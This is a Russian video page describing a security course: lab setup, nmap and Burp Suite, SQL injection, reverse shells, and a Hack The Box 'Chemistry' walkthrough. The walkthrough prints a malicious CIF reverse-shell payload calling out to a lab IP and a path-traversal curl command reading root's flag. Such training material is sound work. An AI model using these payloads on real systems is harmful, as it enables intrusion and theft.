Введение ИБ. Поковыряем WEB c Burp Suite. Операционка, инфра, запуск эксплойтов Chemistry [user.txt] скачать в хорошем качестве

Введение ИБ. Поковыряем WEB c Burp Suite. Операционка, инфра, запуск эксплойтов Chemistry [user.txt]

00:00 Введение в ИБ. "Хакер" - это нестандартное мышления, Может находить закономерности или алгоритмы, которых другие люди не видят {сократить путь} 42:04 Практика {развернем лабораторию, Kali Linux (Burp Shellskript, Nmap, Bridge-NAT-VMNET (VM физически не существует), Docker.io/Juice Shop) ▶MIRO схема: 2 типа гипервизора (виртуализация) и докер (контейнеризация) 56:49 Онлайн-доска: Bridge, NAT (Internet-Sharing), WMNET 1:02:48 nmap 192.168.1.1 -v -SV -O -A --script=vulners Одной из самых известных функций Nmap является удаленное обнаружение ОС с помощью снятия отпечатков/fingerprinting стека TCP/IP. Nmap отправляет серию TCP и UDP пакетов на удаленный хост. 1:08:57 apt-cache search docker Форк (fork с англ. — «развилка, вилка») или ответвление — использование кода программного проекта в качестве старта для другого, при этом основной проект может как продолжать существование, так и прекратить его. 1:35:07 Поковыряем WEB c Burp Suite ▶Веб-пентест - активно ищут и эксплуатируют уязвимости веб-системы. ▶Пентестер - знать и уметь их проводить, обходить системы безопасности и не быть обнаруженным. Вредоносное ПО: знать, анализировать и уметь написать. ▶2 основные методологии: Penetration Testing Execution Standard / Стандарт проведения тестирования на проникновение (PTES). Open Source Security Testing Methodology Manual / Руководство по методологии тестирования безопасности с открытым исходным кодом (OSSTMM). 1:55:40 Burp Proxy→Repeater HTTP-header-fields (часто неточно называемые заголовками HTTP ) - являются компонентами заголовка Hypertext Transfer Protocol (HTTP)-protocol header и передают параметры и аргументы, важные для передачи файлов по HTTP содержат метаданные в парах «ключ-значение», которые отправляются вместе с запросами и ответами HTTP. 2:01:10 Burp Intruder: Навык ручного поиска и эксплуатации SQL-инъекция (SQLi) 2:27:36 SQLmap автоматизация 2:44:23 OWASP TOP 10 2:47:24 dirsearch (gobuster) - инструмент, который проходит по директориям сайта 3:10:12 Парсинг - автоматизированный сбор информации с любого сайта, ее анализ, преобразование и выдача в структурированном виде, чаще всего в виде таблицы с набором данных ▶Automa - Расширение для автоматизации вашего браузера путем соединения блоков. Автоматически заполняйте формы, выполняйте повторяющиеся задачи, делайте скриншоты или извлекайте данные с веб-сайтов. 3:18:02 Операционка, инфра и запуск эксплойтов} ▶Crackmes.one (Reverse Engineering) - разбирать и реверсить бинарные файлы ▶X64dbg.com (обратное проектирование) - отладка, процесс просмотра исполняемых файлов, преобразованных в низкоуровневый ассемблерный код, позволяющий пользователю отладчика видеть, что происходит внутри приложения; даже если оно не является открытым исходным кодом. ▶Hackerone (Bug bounty) - компания, специализирующ. на кибербезопасности , в частности устойчивость к атакам, экспертизы безопасности этичных хакеров с обнаружением активов, непрерывной оценкой и совершенствованием процессов для поиска и устранения пробелов в поверхности цифровых атак. 3:28:12 Chemistry.HTB OpenVPN (1 способ подкл.) 3:36:20 Online-Whiteboard: encrypt; hash → перец:хэшгашиш:соль (пароль в базе надо посолить, поперчить) 3:46:49 Онлайн-доска: reverse shell - захват сервера, обход средств защиты информации, незаметно / меньше следов оставить при пентесте (после эксплуатации уязвимости, заставляем сервер подкл. к нам, В отличие от SSH. Потом закреп. на севере повышая права до рута) {PROXYCHAINS → модуль 39} ▶Файл фужн ▶RCE (модуль 15) - напрямую написать серверу 3:56:28 Chemistry.HTB Pwnbox (🤑2 способ подкл.) cif file exploit github 4:10:37 Proof of Concept (PoC - доказат. [осуществимости] концепции) - не проф. эксплоит, он заметный его сразу внесут в карантин. ▶Профессиональный эксплойт пишется долго профессионалами - Это собственность компании или нелегально 5-10000$ стоит хороший эксплойт, который ничем не детектится, все обфусцировано То есть антивирус не заметит ваш бинарный файл / программой ▶Сертифицированный специалист по разработке эксплойтов [CEDP]: https://cyberwarfare.live/product/cer... ▶Введение в разработку эксплойтов для x86 Linux: https://heise-academy.de/Videokurse/l... ▶scp (Secure CoPy) - утилита для безопасного копирования данных между Linux-системами по протоколу SSH. ▶pscp.exe - утилита для загрузки файлов по SSH в ОС Windows. ▶Команда mc (Midnight Commander) - текстовый файловый менеджер для командной строки, который предоставляет удобный способ управления файлами и каталогами на сервере. 5:11:05 Блиц решение Chemistry.HTB [user.txt] vuln.cif: https://github.com/materialsproject/p... ("/bin/bash -c \'sh -i ⟩& /dev/tcp/10.10.14.59/4444 0⟩&1\'") Chemistry HTB (writeup) ROOT: $ curl localhost:8080 --head $ curl -s --path-as-is http://localhost:8080/assets/../../../../../root/root.txt   / chemistry-htb-writeup